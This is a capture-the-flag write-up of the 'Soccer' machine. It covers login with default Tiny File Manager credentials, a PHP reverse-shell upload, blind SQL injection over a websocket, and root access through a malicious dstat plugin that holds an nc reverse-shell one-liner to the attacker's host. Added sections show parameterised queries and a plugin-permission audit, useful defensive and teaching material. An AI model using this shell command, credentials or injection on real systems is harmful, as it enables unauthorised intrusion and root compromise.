Soccer
Enumeration
Ports and Services
Software Installed:
- Tiny File Manager 2.4.3
Nmap Scan Results:
WFuzz Directory Search:
Initial Foothold
/tiny/
Following the link at the bottom of the page leads to the GitHub page:
https://github.com/prasathmani/tinyfilemanager/blob/master/tinyfilemanager.php
Default usernames/passwords:
admin:admin@123
user:12345
Logged in as admin:
Version:
Uploaded test.php to the uploads directory and opened phpinfo:
Uploaded a PHP reverse shell and executed it, gaining a reverse shell.
Found another webhost/subdomain:
soc-player.soccer.htb is a ticket system.
Appears to do ticket lookups via websockets:
http://soc-player.soccer.htb/
/signup is a general signup page. Once signed up and logged in, you are given a
ticket.
/check:
/check
http://soc-player.soccer.htb:9091
The websocket is vulnerable to a SQL injection attack:
URL: https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-automation.html
From the above URL I used the PoC, changing
data = '{"employeeID":"%s"}' %
to
data = '{"id":"%s"}' %
The id string came from the source of /check:
Found credentials in accounts table in soccer_db:
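The /check lookup takes the id field out of the websocket message and uses it in a database query, which is what makes the blind SQL injection above possible. The following is an added educational example, not the box's code: it assumes a small tickets table (schema constructed here) and shows the string-concatenated lookup next to a hardened version that validates the id and binds it as a query parameter.

```python
import json
import sqlite3

# Constructed stand-in for the table behind the /check websocket lookup.
# Table and column names are assumptions, not the box's real schema.
def build_demo_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tickets (id INTEGER PRIMARY KEY, owner TEXT)")
    conn.executemany("INSERT INTO tickets VALUES (?, ?)",
                     [(1001, "alice"), (1002, "bob"), (1003, "carol")])
    conn.commit()
    return conn

def lookup_vulnerable(conn: sqlite3.Connection, message: str) -> list:
    """Builds the SQL by string formatting: the pattern that lets the
    id value alter the query, as described for /check above."""
    ticket_id = json.loads(message)["id"]
    sql = "SELECT id, owner FROM tickets WHERE id = '%s'" % ticket_id
    return conn.execute(sql).fetchall()

def lookup_hardened(conn: sqlite3.Connection, message: str) -> list:
    """Rejects anything that is not a plain integer id and binds the value
    as a parameter, so the input can never change the query's structure."""
    raw = json.loads(message).get("id")
    if not isinstance(raw, (str, int)) or not str(raw).isdigit():
        return []  # reject and (in a real service) log the malformed request
    return conn.execute("SELECT id, owner FROM tickets WHERE id = ?",
                        (int(raw),)).fetchall()

if __name__ == "__main__":
    db = build_demo_db()
    tautology = '{"id": "x\' OR \'1\'=\'1"}'
    print("vulnerable:", lookup_vulnerable(db, tautology))  # every row
    print("hardened:  ", lookup_hardened(db, tautology))    # nothing
```

The hardened version does two independent things: the allow-list check on the id rejects the blind-injection probes before they reach the database, and the bound parameter means that even a value that slipped past validation is treated as data, never as SQL.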
SSH as player
User.txt Proof Screenshot
User.txt Contents
Privilege Escalation
linpeas.sh showed that the directory /usr/local/share/dstat is writable.
The user has no sudo rights; however, doas is configured:
Created a plugin (plugin file names must start with dstat_) named dstat_pentest.py:
import os
# Plugin body: dstat imports the plugin, so this runs with dstat's privileges
# (root via doas). It opens a reverse shell to the attacking host (10.10.14.14:8888).
os.system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.14 8888 >/tmp/f')
Put dstat_pentest.py in the /usr/local/share/dstat directory.
Ran dstat --list | grep pentest to ensure dstat sees it, then ran dstat as root
with the plugin:
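The root cause of this escalation is a plugin directory that an unprivileged account can write to while a privileged command (dstat via doas) loads code from it. As an added example that is not part of the write-up or of dstat, the audit below checks a plugin directory and its dstat_*.py files for non-root ownership or group/world write bits; the trusted_uid parameter and the demo() directories are constructed for illustration (the demo uses the current uid as the trusted owner because it cannot chown).

```python
import os
import stat
import tempfile

def writable_by_unprivileged(path: str, trusted_uid: int = 0) -> bool:
    """True if an account other than trusted_uid could modify this path:
    either it is owned by someone else, or group/other write is set."""
    st = os.lstat(path)
    return st.st_uid != trusted_uid or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_plugin_dir(plugin_dir: str, trusted_uid: int = 0) -> dict:
    """Returns {path: reason} for the plugin directory and every dstat_*.py
    inside it that an unprivileged user could write to. Empty dict == clean."""
    findings = {}
    if writable_by_unprivileged(plugin_dir, trusted_uid):
        findings[plugin_dir] = "plugin directory writable by non-root"
    for name in sorted(os.listdir(plugin_dir)):
        if name.startswith("dstat_") and name.endswith(".py"):
            full = os.path.join(plugin_dir, name)
            if writable_by_unprivileged(full, trusted_uid):
                findings[full] = "plugin file writable by non-root"
    return findings

def demo() -> tuple:
    """Constructed example: one locked-down plugin dir (0755 / 0644 files) and
    one left writable (0777 / 0666 files), the shape linpeas flagged above."""
    with tempfile.TemporaryDirectory() as base:
        good = os.path.join(base, "good")
        bad = os.path.join(base, "bad")
        for d, dir_mode, file_mode in ((good, 0o755, 0o644), (bad, 0o777, 0o666)):
            os.mkdir(d)
            os.chmod(d, dir_mode)  # explicit chmod so the umask cannot interfere
            plugin = os.path.join(d, "dstat_example.py")
            with open(plugin, "w") as fh:
                fh.write("# constructed placeholder plugin\n")
            os.chmod(plugin, file_mode)
        me = os.getuid()
        return audit_plugin_dir(good, me), audit_plugin_dir(bad, me)

if __name__ == "__main__":
    # Real use on a host: audit_plugin_dir("/usr/local/share/dstat")
    clean, flagged = demo()
    print("clean dir findings:", clean)
    print("flagged dir findings:", flagged)
```

The fix is the mirror image of the check: the plugin directory and its files should be root-owned and mode 0755/0644, and any doas or sudo rule that lets a user run dstat as root should be treated as a rule that lets them run whatever is in that directory as root.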
Root Screenshot Here:
Root.txt Contents: